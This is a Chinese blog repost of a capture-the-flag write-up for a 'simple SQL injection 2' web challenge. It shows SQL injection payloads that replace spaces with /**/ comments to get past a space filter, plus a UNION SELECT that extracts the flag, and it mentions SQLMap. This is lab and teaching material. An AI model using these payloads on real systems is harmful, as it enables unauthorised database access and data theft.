博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
实验吧—Web——WP之 简单的sql注入之2
阅读量:4919 次
发布时间:2019-06-11

本文共 264 字,大约阅读时间需要 1 分钟。

直接打开解题连接:

既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了

输入语句

1'and 1=1 #

1'and/**/1=1/**/#后

对比一下,发现是过滤掉了空格,我们用/**/代替空格

 

 

下面就要构造找flag的语句了

1'/**/union/**/select/**/flag/**/from/**/flag#

最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)

 

 

 

转载于:https://www.cnblogs.com/Yuuki-/p/8268959.html

你可能感兴趣的文章
Oracle 社区动态、中文讲座,最佳实践
查看>>
GNU make manual 翻译( 九十五)
查看>>
向量空间模型 和 信息熵
查看>>
python-list操作
查看>>
[uva] 639 Don't Get Rooked
查看>>
讨论cocos2d-x字体绘制原理和应用方案
查看>>
洛谷P2015 二叉苹果树
查看>>
keytool生成证书(转)
查看>>
poj sticks 木棍 枚举+搜索+小技巧
查看>>
后缀数组模板 (详细注释)
查看>>
TCL-事务
查看>>
.Net 使用NPOI 实现Excel的简单导入导出 - Ran0 - 博客园
查看>>
实用矩阵类(Matrix)(带测试)
查看>>
Packing Rectangles chapter1.4
查看>>
TQ210裸机编程(3)——按键(查询法)
查看>>
大二实习使用的技术汇总(下)
查看>>
Nagios在Ubuntu server上的安装配置
查看>>
未能加载文件或程序集“SharpSvn.dll”或它的某一个依赖项。找不到指定的模块。...
查看>>
js基础之动画(三)
查看>>
win7下安装Ubuntu14.04
查看>>